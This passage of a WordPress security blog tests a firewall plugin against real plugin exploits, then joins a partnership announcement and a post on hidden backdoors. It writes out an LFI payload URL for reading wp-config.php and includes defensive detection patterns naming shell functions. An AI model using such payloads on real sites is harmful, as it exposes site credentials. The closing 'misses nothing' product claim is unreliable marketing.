Because this version of the plugin is vulnerable, it will execute the code to try and select the user credentials from users 3, 4, 5, 6 and 7.

We used this in our browser’s address bar.

(Note: this is why, for this attack and the couple of others following, we’re going to ask you to look closely at the address bar.)

Running the test in the address bar

Once we entered the same code into the address bar of the browser, this is what showed up on the test site (look at the address bar carefully, please):

NinjaFirewall doesn’t take entering SQL code into the address bar very lightly.

But how did things work out behind the scenes of the attack?

Firewall Log for SQL Injection

This is what NinjaFirewall’s Firewall Log had to show us:

How NinjaFirewall logged the SQL Injection attack

It looks like the firewall already had this exploit in its list in the Rules Editor section, and hence it detected the exploit and prevented it from occurring.

2. Arbitrary File Upload and Local File Inclusion (LFI)

There were a couple of vulnerable plugins that came to mind when we thought of Local File Inclusion. One was Slider Revolution (v 3.05), and the other was Gravity Forms (< v 1.8.19).

We chose Slider Revolution though, because it allowed us to perform both exploits, and because more than 100,000 sites were attacked in 2014 through this plugin.

Testing NinjaFirewall against Local File Inclusion

The Slider Revolution plugin was used to perform Local File Inclusion on vulnerable websites in the following manner:

Say the vulnerable site was called ‘victim.com’.

The vulnerability allowed attackers to request that the RevSlider plugin on the vulnerable site show the images in the slider. Once it did that, the attackers would also try to figure out the structure of the WordPress directory. They would then get it to include files from the website’s local server (like wp-config.php) among the files it revealed. So the final URL entered on the site would be something like:

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

We used a very similar approach to try and get the plugin to include the wp-config.php file of the website, and to reveal it.

Here is how NinjaFirewall reacted:

Running the test

NinjaFirewall on Local File Inclusion: You shall not pass! NinjaFirewall didn’t let us perform a Local File Inclusion.

Since the action got blocked, we just checked out the Firewall Log.

Firewall Log for Local File Inclusion

What NinjaFirewall’s Firewall Log registered the LFI attack as. This is what NinjaFirewall had to say about the attempt to include a file locally on the test site.

     

Testing NinjaFirewall against Arbitrary File Upload

Again, trying to cover two attacks with the same plugin, we tried uploading random (or arbitrary) files to the test site. If the attempt is successful, the damage to the site would depend on the kind of file uploaded, and what it was intended to do.

Take a look at the address bar to see what we’ve tried to do.

Now don’t get confused: we named the files to be uploaded “revslider” so that they would be accepted more easily by the plugin.

Running the test

NinjaFirewall successfully blocks Arbitrary File Uploads. We used a Google Chrome extension to test the Arbitrary File Upload exploit. The exploit was unsuccessful.

Again, we only checked out the Firewall Log, since this attack was unsuccessful.

Firewall Log for Arbitrary File Upload

Here is what the Firewall Log said:

The Firewall Log for Arbitrary File Uploads

     

3. Brute Force Attacks

As mentioned earlier, to protect against Brute Force attacks, NinjaFirewall has a separate option called Login Protection.

Testing NinjaFirewall against Brute Force attacks

Just to test its effectiveness, a colleague of mine, Vijay, tried launching a Brute Force attack against the website using Hydra, a tool that helps test websites and crack admin credentials.

Running the test

We launched a Brute Force attack against the site when we’d set “Enable Brute Force Attack Protection” to “No”. This is what Hydra got us:

Hydra was able to get the admin credentials from the site

As you can see, the attack was successful, and Vijay was able to get the site admin’s login credentials.

Then, we went ahead and enabled the Login Protection feature:

Setting Login Protection to ‘Yes, if under attack’

Vijay then launched the attack again. This is what Hydra’s log said:

Hydra was unsuccessful

Firewall Log

A quick look at how the attack was reported in NinjaFirewall’s Firewall Log (this shows how the attack was let through, and then stopped):

The Firewall Log for Brute Force Attacks
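What a “Login Protection” option boils down to is counting failed logins per client in a sliding window and refusing further attempts for a while once a threshold is hit. As an added example (not NinjaFirewall’s code; the log format, the IP addresses and the timestamps in `SAMPLE_LOG` are constructed), here is that logic in Python replayed over a constructed login log. It includes the case the two Hydra runs above contrast: the attacker eventually guesses right, but by then is already locked out, so the correct password is never checked:

```python
"""Failed-login throttling of the kind a 'Login Protection' option provides.

Added example for this review, not NinjaFirewall's code. The log format
("<ISO time> <client ip> <FAIL|OK> <username>") and SAMPLE_LOG are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5                   # failures within WINDOW that trigger a lockout
WINDOW = timedelta(minutes=5)
LOCKOUT = timedelta(minutes=15)

# Constructed sample: five fast failures, a correct guess while locked out,
# a legitimate user who mistypes once, and the attacker back after the lockout.
SAMPLE_LOG = """\
2017-03-01T10:00:01 203.0.113.7 FAIL admin
2017-03-01T10:00:02 203.0.113.7 FAIL admin
2017-03-01T10:00:03 203.0.113.7 FAIL admin
2017-03-01T10:00:04 203.0.113.7 FAIL admin
2017-03-01T10:00:05 203.0.113.7 FAIL admin
2017-03-01T10:00:06 203.0.113.7 OK admin
2017-03-01T10:01:00 198.51.100.4 FAIL editor
2017-03-01T10:01:10 198.51.100.4 OK editor
2017-03-01T10:16:00 203.0.113.7 FAIL admin
"""


class LoginGuard:
    """Per-client sliding-window failure counter with a temporary lockout."""

    def __init__(self, threshold=THRESHOLD, window=WINDOW, lockout=LOCKOUT):
        self.threshold = threshold
        self.window = window
        self.lockout = lockout
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.locked_until = {}              # ip -> time the lockout expires

    def check(self, ts: datetime, ip: str, outcome: str) -> str:
        """Decide one login attempt.

        'blocked': rejected before WordPress sees it (client is locked out), even if
                   the password in this attempt happened to be right;
        'locked' : this failure reached the threshold and started a lockout;
        'allowed': passed through to the normal credential check.
        """
        until = self.locked_until.get(ip)
        if until is not None:
            if ts < until:
                return "blocked"
            del self.locked_until[ip]  # lockout expired
        if outcome == "OK":
            self.failures.pop(ip, None)  # a real login clears the counter
            return "allowed"
        recent = self.failures[ip]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()  # drop failures that fell out of the window
        if len(recent) >= self.threshold:
            self.locked_until[ip] = ts + self.lockout
            recent.clear()
            return "locked"
        return "allowed"


def replay(log_text: str, guard: LoginGuard = None) -> list:
    """Run the guard over log lines; returns one (ip, user, decision) per attempt."""
    guard = guard or LoginGuard()
    decisions = []
    for line in log_text.splitlines():
        stamp, ip, outcome, user = line.split()
        decisions.append((ip, user, guard.check(datetime.fromisoformat(stamp), ip, outcome)))
    return decisions


if __name__ == "__main__":
    for ip, user, decision in replay(SAMPLE_LOG):
        print(f"{ip:14} {user:8} {decision}")
```

Two details matter in practice. The decision is made before the password is checked, so a lockout costs the attacker the correct guess as well as the wrong ones; and the counter is keyed by client address, which is exactly why distributed brute force (many addresses, few attempts each) needs an additional per-account limit that this sketch leaves out.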

     

4. Remote File Inclusion (RFI), Arbitrary Code Execution, and Backdoors (a custom hack)

We used TimThumb because it was a widely used plugin, and it exhibited a vulnerability that allowed millions of WordPress sites to get hacked. This test was therefore meant to check the basics of the firewall.

Testing NinjaFirewall against Remote File Inclusion and Arbitrary Code Execution

For this, we used the (currently defunct) Pict.Mobi widget, which used TimThumb (v 1.28), on the test site. Obviously, since the RFI exploit would need a hackfile to be included from a remote location, we also created another site that would host the bad file.

We took the approach a hacker would: we first confirmed that the (test) site used TimThumb, and that it used a vulnerable version.

“Does this site have TimThumb?” (an optimistic hacker). Most hackers look for vulnerable plugins on your site.

Then we selected a very small file (in this case, a 16x16 .png icon), and modified it to contain PHP code.

Modifying a small image to contain malicious PHP code

Next we used the TimThumb vulnerability to include the file remotely on the test site. Note that the file was PHP, which means that any time it was accessed, it would run.

Including the malicious file remotely on our website (notice the address bar!)

Sure, it was an image file, so it could easily bypass the site’s usual checks, but the PHP code could still be accessed, and executed.

Testing NinjaFirewall against Backdoors

We wanted to kill three birds with one stone, so we made sure to create an encrypted shell for the PHP code in the image before we uploaded it.

Running the test

We then extracted the code from the hackfile’s shell, just like a hacker would:

Extracting code from the hackfile’s shell

And then ran it.

Executing the code: a three-in-one attack. The website gave us what we wanted.

NinjaFirewall didn’t stop the attack.

We think it was because NinjaFirewall has a list of rules for what attacks should look like, in a section called Rules Editor.

A look at NinjaFirewall’s Rules Editor

Click on the drop-down, and you see the list of rules that NinjaFirewall follows:

The Rules Editor has an extensive list

These rules are internal to NinjaFirewall, so you can’t see what exactly each rule entails.

The attack we performed, though, didn’t exactly go by the rules of how these attacks usually work. The results of the tests are as follows:

Firewall Log

The log didn’t pick up on the hack. In fact, it only listed the backdoor we’d tested it for.

The Firewall Log only registered the backdoor.

File Check

The firewall didn’t detect changes in files. We were still able to list the files in the WordPress directory.

NinjaFirewall’s File Check results: what File Check showed up

Anti-Malware

We didn’t expect this feature to remove the malware, because it’s only a scanner.

Unfortunately, it didn’t find the infected files. We were under attack, and this is what the anti-malware feature said:

What the Anti-Malware feature said

Live Log

No blips on this feature either.

The results on Live Log

Unresolved issues with NinjaFirewall

Since this is a review of the entirety of NinjaFirewall, we didn’t only test it against vulnerabilities. We also checked for issues other than those of protection. Most of these issues are documented on NinjaFirewall’s forum on WordPress.org, or in its online documentation.

● Anti-Malware scans time out

The Anti-Malware feature on NinjaFirewall allows you to scan the files in a particular directory of your site for malware (by default this is /var/www/html/wordpress/).

The thing is, by default, this feature scans your site for malware in files that have been created or changed in the last 7 days. You can change the time period (or Timestamp), or even make it zero, in which case it scans your whole site.

The options that Anti-Malware shows you

However, if your website is on a shared host, there is one major problem you could face: the Anti-Malware scan timing out. The feature stops scanning your site after a certain time period that is set by your web host. This means that if you have too many files on your site, the scan will get cut short. Your site could never get fully scanned, unless you try some workarounds (like this one suggested by the NinjaFirewall team). This is probably why NinjaFirewall’s Anti-Malware feature also has the two options “Ignore file extensions” and “Ignore files/folders”:

Working around NinjaFirewall’s time-out issue

While there isn’t anything NinjaFirewall can do to change the timing out of the scan, it is a huge drawback for users who want to scan their sites.

● The Anti-Malware feature uses only signatures to detect malware

This is a widely used method to identify malware and viruses, but it doesn’t catch everything. This is why most security scanners use it in combination with other approaches. Hacks utilize vulnerabilities on your site, but how bad code is run on your site depends completely on how hackers want to carry out the attack. So the ‘signature’ of malware can always be altered in small ways so as to escape detection. This is why, as we explained earlier, our exploit of the vulnerabilities in the Pict.Mobi plugin allowed for RFI, Arbitrary Code Execution and Backdoors on our test site.

● The firewall modifies .htaccess files

NinjaFirewall backs up the PHP INI and .htaccess files that it has to modify, but modifying the .htaccess file in itself can wreak a lot of havoc on your site. The .htaccess file controls a lot on your WordPress site. One of its more obvious functions is access control (i.e. which users are allowed onto your website), but it also dictates how files with certain extensions run on your site. This is why any minor slip-up with this file could cause your server to majorly malfunction. Just to be on the safer side, we recommend that you back up your entire site rather than just the .htaccess file. That way, even if something breaks, you can always roll back to a working version of your site.

● Modifying the .htaccess and php.ini files slows down your site

.htaccess gives you access to the configuration of directories on your website even if you don’t have access to your hosting server’s (e.g. Apache’s) main configuration file.

This means that when your site is configured to direct traffic based on the modifications made to .htaccess, Apache has to look for, and load, all the .htaccess files on any request made to your site. As a result, your WordPress site’s load time increases.

It’s a good way to direct traffic when your main server configuration file isn’t accessible, but otherwise it isn’t a great thing.

● The firewall interrupts backup operations regularly

NinjaFirewall triggers false alarms when WordPress backup plugins are run, and sometimes doesn’t allow backup plugins to back up the site. The firewall also has to be disabled before migrating your site to a new IP address.

● Can’t manually install NinjaFirewall

As mentioned earlier, NinjaFirewall might log you out of your WordPress site and deny you access if you use an FTP client to make changes to it, or even to uninstall it. Anything that you need to do with respect to this plugin has to be done from your WordPress dashboard.

Verdict

NinjaFirewall seems like a powerful tool against known attacks that occur according to their signatures. But the thing is that most hackers know these signatures, and know that most security measures protect against these signatures. So they modify the signatures to perform more successful and, at times, more devastating attacks.

Alerting of attacks after they’ve taken place isn’t something a lot of website owners can afford, especially with the damage hacks can wreak. However, having a hack-cleaner might help you scan for, and remove, the malware that causes the damage. In any case, it’s always important to have a dependable backup service for your WordPress site.

Did you like this review of NinjaFirewall? Would you like to see other firewalls tested too? Let us know in the comments!

BlogVault, in collaboration with Pantheon, has developed Pantheon Migrations. Pantheon is the world’s largest website management platform, delivering Drupal and WordPress as a service. Pantheon’s multi-tenant, container-based cloud platform enables web teams to build, launch, and run all of their websites from a single dashboard with ease.

You can now migrate your WordPress sites to Pantheon with ease. Just input your SFTP credentials, email, and the destination URL, and you’re good to go. Pantheon will notify you when the migration begins and completes via email. You can also track the progress of the entire process on our website, via your BlogVault dashboard.

For us, at BlogVault this is the latest partnership for migrations. Previously we have partnered with other companies like WP Engine, Savii, & Cloudways. Now you can enjoy the convenience and expertise we strive to bring you while migrating to Pantheon as well.

BlogVault partners with Pantheon for easy WordPress migrations

You can always enjoy easy migrations with our backup plugin, BlogVault, too. Apart from backups and migrations, the plugin also offers auto-restore, test-restore and security settings to improve your WordPress website’s security posture.

While the partnership adds an exciting page to BlogVault’s story, we’re also looking ahead. Our mission of developing the best in WordPress backup and security has led us to our next product. It’ll launch shortly and promises to change the way users deal with WordPress security issues on their sites. Until then, stay safe and don’t forget to backup!

Removing malware from your website, and getting rid of hacks is a painstaking process. When you’re a website owner whose site has been hacked, your online reputation takes a hit. It’s only more distressing when you keep getting hacked. The reason behind this, most of the time, is a ‘backdoor’.

Having a backdoor could be explained with some ease, by comparing it to something we could call a “spare-key situation”.

Suppose you had a spare key to your house, but you dropped it somewhere on your street. Someone creepy has found it, and unfortunately for you, this person also knows exactly where you live. Of course you don’t know about it, but you notice changes at home.

Whether all the furniture in your house is gone, or whether the sofa is always a little warmer in the morning depends entirely on what this person with the spare key is doing in your house. This means unless you change your locks or employ other security measures, this stranger has full access to your home, and will keep coming back.

Hackers also do something similar when they hack WordPress sites.

When a hacker exploits a vulnerability and hacks a site, they want to be able to enter it again in the future. They also want to do so without needing to put in the effort again. This becomes difficult, though, if the site owner closes the vulnerability by updating the exploitable theme or plugin. That is why hackers leave behind code called backdoors on the site. This way, even if the vulnerability is fixed, the backdoor remains. Backdoors are inconspicuous, because the longer they stay hidden, the longer the attacker has a way to get back in.

Backdoors can give hackers complete control through Arbitrary Code Execution. One of the most common backdoors is ‘Filesman’. Since it’s feature-rich, it allows hackers to perform a variety of functions. However, there are others too, which might be just three or four words of code, but prove to be equally dangerous.

A lot of the time, backdoors are disguised as WordPress files, and are hidden by the hacker in a place only they know. You, as an admin, could find the file only if you combed through all the WordPress files. This is especially difficult because backdoors can go in so many different places.

Here are a few places backdoors are usually hidden on your WordPress site:

  1. In core WordPress folders: Adding a new file to, or modifying an existing file in, a core WordPress folder (e.g. wp-includes, wp-admin or wp-content) can easily go unnoticed. This is especially true of the wp-includes folder, since it contains every file ever included into the site. This is why we noticed a lot of backdoors here.
  2. In new, innocent-looking folders: Hackers could add hackfiles to new folders that look completely innocuous, like ./images/
  3. Plugins and Themes: Not many people bother to check these folders after the plugins/themes have been installed. This makes these folders a perfect target. Moreover, a lot of plugins have their own vulnerabilities. Another way hackers install backdoors is by adding a new plugin to the site that looks normal, but is actually malware.
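The three hiding places above suggest checks that do not rely on a file’s name, which is exactly what a disguised backdoor is chosen to defeat. As an added example (not code from this post or from any product it names; `SAMPLE_FILES` and the pattern list are constructed and illustrative), here is a Python scan over an in-memory file set that flags PHP sitting in static-content directories and files that combine several risky traits, while leaving alone a core-style file that merely calls `base64_decode` once:

```python
"""Heuristics for the hiding places the post lists: core folders, innocent-looking
folders such as images/, and plugin or theme directories.

Added example, not code from the post or from any product it names. SAMPLE_FILES is a
constructed set of (relative path, contents) pairs; the patterns are illustrative, and
any fixed pattern can be evaded, so this complements rather than replaces a file diff.
"""
import re

# Directories that serve static content; executable PHP has no business there.
STATIC_DIRS = ("wp-content/uploads/", "images/", "wp-content/cache/")

# Traits that are individually common in legitimate code but rarely occur together.
TRAITS = [
    ("dynamic_eval", re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)),
    ("decoded_payload", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("shell_exec", re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I)),
    ("request_input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")),
    ("known_shell_marker", re.compile(r"FilesMan", re.I)),   # the family the post names
]

SAMPLE_FILES = [
    # benign core-style file: a single decoding call is normal and must not be flagged
    ("wp-includes/functions.php",
     "<?php\nfunction example_unpack($s) { return base64_decode($s); }\n"),
    # benign theme file
    ("wp-content/themes/example-theme/functions.php",
     "<?php\nadd_action('init', 'example_theme_init');\n"),
    # PHP dropped where only images should live
    ("wp-content/uploads/2017/03/image.php", "<?php echo 'hello';\n"),
    # plugin-looking file that evaluates request-supplied, encoded code
    ("wp-content/plugins/seo-helper/seo-helper.php",
     "<?php\n/* Plugin Name: SEO Helper */\n@eval(base64_decode($_POST['data']));\n"),
    # file named to look like core, carrying the marker of a well-known shell family
    ("wp-includes/wp-tmp.php", "<?php // FilesMan\n$key = $_COOKIE['k'];\n"),
]


def scan_file(rel_path: str, content: str) -> list:
    """Reasons this file looks like a backdoor; an empty list means it looks clean."""
    reasons = []
    is_php = rel_path.lower().endswith(".php") or "<?php" in content
    if is_php and rel_path.startswith(STATIC_DIRS):
        reasons.append("php_in_static_dir")
    hits = [name for name, pattern in TRAITS if pattern.search(content)]
    # Require two traits: core itself calls base64_decode, and themes read $_GET legitimately.
    if len(hits) >= 2:
        reasons.extend(hits)
    return reasons


def scan_tree(files) -> dict:
    """files: iterable of (relative path, content). Returns {path: reasons} for flagged files only."""
    report = {}
    for rel_path, content in files:
        reasons = scan_file(rel_path, content)
        if reasons:
            report[rel_path] = reasons
    return report


if __name__ == "__main__":
    for path, reasons in scan_tree(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(reasons)}")
```

The two-trait rule is the point of the example: it is what keeps the scan from drowning a core directory in false positives, and it is also the kind of threshold an attacker works around by splitting a payload across files or building function names from string fragments. That is why a location rule (PHP under `uploads/`) and a file-integrity diff of the core folders catch cases that content patterns alone miss.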

Just to give you a general idea, this is how you identify a backdoor (that looks like a plugin file):

Backdoor

These backdoors are sneaky. They can be passed off by a number of malware scanners as legitimate files, because of the way they’re named. This is why it’s so difficult to identify backdoors.

Backdoors are especially infuriating because sometimes hackers choose to leave more than one of them, in many locations. So even if one was discovered, there would be another way in.

Accurate, efficient scanning and hack removal require time, and technical assistance (which is usually expensive). If you’d like to test the only one-click, automated hack-cleaner that misses nothing, and sounds no false alarms, we suggest that you try MalCare, for free.